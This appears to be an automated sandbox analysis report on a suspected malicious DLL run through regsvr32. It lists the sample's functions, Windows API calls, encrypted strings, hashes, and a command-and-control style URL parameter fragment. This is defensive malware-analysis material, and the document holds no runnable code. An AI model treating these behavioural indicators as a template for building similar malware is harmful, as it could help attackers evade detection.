1cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa$a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849$a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a$a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd$a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653$a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac$a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32$ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335$ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace$adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db$ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62$ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1$af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a$b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a$b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb$b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c$b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed$b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290$ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1$bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64$bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee$bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147$bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e$bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1$bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af$bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697$c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1$c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494$c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef$c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb$c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae$c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2$c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909$ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43$ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da$cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee$cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d$cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0$d29f33018596af56885209a0391cf43d81722440b5$d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce$d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4$d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983$d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7$d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd$d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee$d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57$d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3$d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea$dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1$dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581$dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb$e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c$e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0$e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f$e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b$ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef$eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae$ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0$ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3$f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312$f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89$f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5$f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e$f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7$f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a$f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700$fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2$fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df$ff37083708963434836f8f0c252e8680adff9bc9a0451464a4
API String ID: 1162954093-2434349084
Opcode ID: 787ddbc48a6b48528fe184a93433feee288d838829e6d0c4263c56063724a2ee
Instruction ID: 8dd3aaa179e2cc01a1f9e566bee556a03b543aacbbe6c2b3b2fafa4dceb21b38
Opcode Fuzzy Hash: 787ddbc48a6b48528fe184a93433feee288d838829e6d0c4263c56063724a2ee
Instruction Fuzzy Hash: DCB330A1F56A0256EE00EBE5D455BFC13A1BF41384FC81539D90EE67AAEEACF548C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB7EB0, Relevance: 70.8, APIs: 30, Strings: 10, Instructions: 815registryUNIQUE

Download Yara Rule

APIs

RegCloseKey.KERNELBASE ref: 00007FF983DB855B
SHCreateDirectoryExW.SHELL32 ref: 00007FF983DB8573

Part of subcall function 00007FF983D981A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D98305
Part of subcall function 00007FF983D981A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D9830B

Part of subcall function 00007FF983DAB330: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DAB572

ExitProcess.KERNEL32 ref: 00007FF983DB8AE7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8BF8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8BFE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C04
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C0A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C10
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C1C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C22
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C28
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C2E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C34
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C3A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C40
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C46
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C4C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C58
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C5E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C64
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C6A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C70
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C7C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C82
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB8C8E

Strings

c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190, xrefs: 00007FF983DB8340
/s ", xrefs: 00007FF983DB80CC
a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f, xrefs: 00007FF983DB88D8
a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f, xrefs: 00007FF983DB845B
370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00, xrefs: 00007FF983DB7EF9
a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd, xrefs: 00007FF983DB89BB
?, xrefs: 00007FF983DB837E
980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29, xrefs: 00007FF983DB87F5
384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19, xrefs: 00007FF983DB80A4
8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba, xrefs: 00007FF983DB8712

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseConcurrency::cancel_current_taskCreateDirectoryExitProcess
String ID: /s "$370d6e253a3a93578a1081bc37558c01722c167025728cb4506e8b5b00$384865358c1009170caffeb6d4d848844a676523d9bb81a4864cca19$8d97e5df64af8f0f887abdaf70bd9d03c634a8151ed02d46839645838755ba$980245d50706ff3f0ed2ada3505e009dcbaa9d2d4f2795c5a51ec70b29$?$a337e267db176c5fb3deb0ceddc5345fe682342094e5fde3258f50cb66c792b97f$a5447b3d1d5061d1218efa5828cda002f0c7deaedce2ea4f01fd$a7b2e3dcbd563607bcb20621dc9ed30be13cb30bd3f78ce436ed9fd17f$c49ff0c512b63183b3b9933942f35f3b9767f14025f2b157b84cb6ecdc406c389a71dd4f34ecb955915b94eed958752b816acc6c0cc9917da04584c8e458693190
API String ID: 4181945512-2298773885
Opcode ID: fee4fe69c4ce4e82b81c96986d6a7cc5a9a9ef15443a013aea5037683e873e01
Instruction ID: 4fdd87200259a16db5eb820e8e092873e91201a9d5bb64b744180a3fcdcc4861
Opcode Fuzzy Hash: fee4fe69c4ce4e82b81c96986d6a7cc5a9a9ef15443a013aea5037683e873e01
Instruction Fuzzy Hash: D48254A2B1478185EF00DBB4D4847AD2361FB417A4F949239EA5D67AE9DFBCF189C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB79B0, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 299sleepsynchronizationUNIQUE

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF983DB79F2
CreateMutexW.KERNEL32 ref: 00007FF983DB7A4B
GetLastError.KERNEL32 ref: 00007FF983DB7A54
CloseHandle.KERNEL32 ref: 00007FF983DB7A64
ExitProcess.KERNEL32 ref: 00007FF983DB7CF7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7EA1

Strings

842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9, xrefs: 00007FF983DB7B7A
651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef, xrefs: 00007FF983DB7A10

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseCreateErrorExitHandleLastMutexProcessSleep
String ID: 651a77c90efb857ab62008a5a730e362365c52c9a23ec8c4001329a13434e5b6e3cc8b774885327ffaef$842f4e43a902b0a195d8c702c508d594f4b48dab7001d91de450b9de630efb1ceca29ea92d5f9d53a518acdd3842f201f6af93e378548158a850bad96e01a158b9
API String ID: 1555049902-3969698901
Opcode ID: fc1ad2462030ac6af6ab798ba2c9c29fbfa56a2eaa562c4d946266715e059da3
Instruction ID: 7b62434556e4cfe6be49475ec9aed88bf1e4ff1f6676e65a6e14563e2c3a8cdf
Opcode Fuzzy Hash: fc1ad2462030ac6af6ab798ba2c9c29fbfa56a2eaa562c4d946266715e059da3
Instruction Fuzzy Hash: 1BD1B3A2B0464282EB04DBA4D458BAD23A1FF44794F84453DDA5EABBD9DFBCF548C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB72C0, Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 420UNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983D981A0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D98305
Part of subcall function 00007FF983D981A0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF983D9830B

SHGetFolderPathW.SHELL32 ref: 00007FF983DB74D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7958
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB795E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7964
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB796A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7970
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7976
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB797C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7982
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7988
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB798E

Strings

413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432, xrefs: 00007FF983DB73DE
b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347, xrefs: 00007FF983DB7788
953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3, xrefs: 00007FF983DB74F7
41352f26a97e153f7b3157b47315edb36e, xrefs: 00007FF983DB7453

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFolderPath
String ID: 41352f26a97e153f7b3157b47315edb36e$413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432$953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3$b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347
API String ID: 4036707352-3052264634
Opcode ID: 5abb4357f2a9fd7a0aa4fcb53fe3a4722edb279ad6f62a89d3a63c182062bf4f
Instruction ID: 3265e3d97d22f0ac22ab2b88b03a0f45e33776d8a4bc028a88683b1a264b692b
Opcode Fuzzy Hash: 5abb4357f2a9fd7a0aa4fcb53fe3a4722edb279ad6f62a89d3a63c182062bf4f
Instruction Fuzzy Hash: E51288A2B1478195EF00DFA4D484B9D2361FF417A8F845235EA5E5BAE9DFBCE188C340

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA4C00, Relevance: 37.2, APIs: 14, Strings: 7, Instructions: 411UNIQUE

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32 ref: 00007FF983DA50DF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5264
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA526A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5270
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5276
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA527C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5282
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5288
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA528E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA5294
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA529A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA52A0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA52A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DA52AC

Strings

/?m=b&p1=, xrefs: 00007FF983DA5EE7
213c047b04d010be7d6d5daba9287cdb0f472e25, xrefs: 00007FF983DA5D25
c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60, xrefs: 00007FF983DA5999
&p2=b, xrefs: 00007FF983DA5F12
076bf1dc1c002df98f90329224a226012927b807, xrefs: 00007FF983DA5B4B
flag, xrefs: 00007FF983DA5129
2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4, xrefs: 00007FF983DA4C50, 00007FF983DA4F33

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateDirectory
String ID: &p2=b$/?m=b&p1=$076bf1dc1c002df98f90329224a226012927b807$213c047b04d010be7d6d5daba9287cdb0f472e25$2a812beda6215ee45decbe4eac3e4bb84ca1eb61b4$c342b11d0cbf3e0eec1b60c6fc0e2906edd50d60$flag
API String ID: 3745306311-2943265622
Opcode ID: febd2412d6c6687db0b818b4291c294bb880df6f30e85d0b4f72e77c755815f2
Instruction ID: ed717359305b115b4a8f3e9616ca09cc8f972e7c0f38b0c65efc071ba58bf892
Opcode Fuzzy Hash: febd2412d6c6687db0b818b4291c294bb880df6f30e85d0b4f72e77c755815f2
Instruction Fuzzy Hash: A002C8A2B2478185EF00DFA4D484BAD2366FB417A8F845639EA5D57AD9DFBCF148C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D91936, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 316processfileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF983D91CFD
CloseHandle.KERNEL32 ref: 00007FF983D91D06
CreateProcessW.KERNEL32 ref: 00007FF983D91D97
CloseHandle.KERNEL32 ref: 00007FF983D91DA5
CloseHandle.KERNEL32 ref: 00007FF983D91DAF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E2D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E33
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E39
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E3F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E51
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E57
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91E5D

Strings

h, xrefs: 00007FF983D91D49
78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee, xrefs: 00007FF983D91AF0

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$CreateFileProcessWrite
String ID: 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee$h
API String ID: 2469797495-2933482531
Opcode ID: 55178184eb09f104d79d07a263a33a643988dc765b419fed74ace35f13dc1d84
Instruction ID: 371abaac4f873830af449f98aae34a0f14d08a6567ca77bcda089b4688665bd9
Opcode Fuzzy Hash: 55178184eb09f104d79d07a263a33a643988dc765b419fed74ace35f13dc1d84
Instruction Fuzzy Hash: 19D172A2A1478185EB10CFB4D4457AD23A1FB457A8F845739EA6E57BD9DFBCE084C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D922E0, Relevance: 18.2, APIs: 12, Instructions: 159processfilesynchronizationUNIQUE

Download Yara Rule

APIs

CreatePipe.KERNELBASE ref: 00007FF983D92374
GetStartupInfoW.KERNEL32 ref: 00007FF983D923A8
CreateProcessW.KERNEL32 ref: 00007FF983D9240A
WaitForSingleObject.KERNEL32 ref: 00007FF983D92427
GetFileSize.KERNEL32 ref: 00007FF983D9243F
ReadFile.KERNEL32 ref: 00007FF983D92483
CloseHandle.KERNEL32 ref: 00007FF983D92528
CloseHandle.KERNEL32 ref: 00007FF983D92532
CloseHandle.KERNEL32 ref: 00007FF983D9253D
CloseHandle.KERNEL32 ref: 00007FF983D92548

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFile$InfoObjectPipeProcessReadSingleSizeStartupWait
String ID:
API String ID: 1192957364-0
Opcode ID: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
Instruction ID: e2524072ec0d5df9242b951bb1f3ad6fd559df2e95113464952bd3830599f659
Opcode Fuzzy Hash: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
Instruction Fuzzy Hash: 5D717172A08B4186E700CF65E8547AD77A0F784B98F544239DE8D97B69DFBCE145C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB9628, Relevance: 15.2, APIs: 10, Instructions: 230UNIQUE

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF983DB9650
__scrt_acquire_startup_lock.LIBCMT ref: 00007FF983DB96A2
_RTC_Initialize.LIBCMT ref: 00007FF983DB96D0
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FF983DB96F6
__scrt_release_startup_lock.LIBCMT ref: 00007FF983DB9721
__scrt_fastfail.LIBCMT ref: 00007FF983DB9787

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
String ID:
API String ID: 2904100720-0
Opcode ID: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
Instruction ID: d390045d5e5422036cbd31e9f919367fea3ba36290e882710473303d6fd677d2
Opcode Fuzzy Hash: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
Instruction Fuzzy Hash: E0817EE1E0C28246FA51DBA59441BB96690BF85780FDC403DE94EEB396DEBCF849C710

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D91608, Relevance: 10.7, APIs: 7, Instructions: 153sleepUNIQUE

Download Yara Rule

APIs

SHCreateDirectoryExW.SHELL32 ref: 00007FF983D9178F
GetTempFileNameW.KERNELBASE ref: 00007FF983D917B1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91855
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9185B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91861
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91867
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9186D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91873
Sleep.KERNELBASE ref: 00007FF983D918BE

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CreateDirectoryFileNameSleepTemp
String ID:
API String ID: 3305644664-0
Opcode ID: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
Instruction ID: e32ffcacbca9169ca90f7e18a7bf7e1456c55692290a9c8b912445551adf2bf1
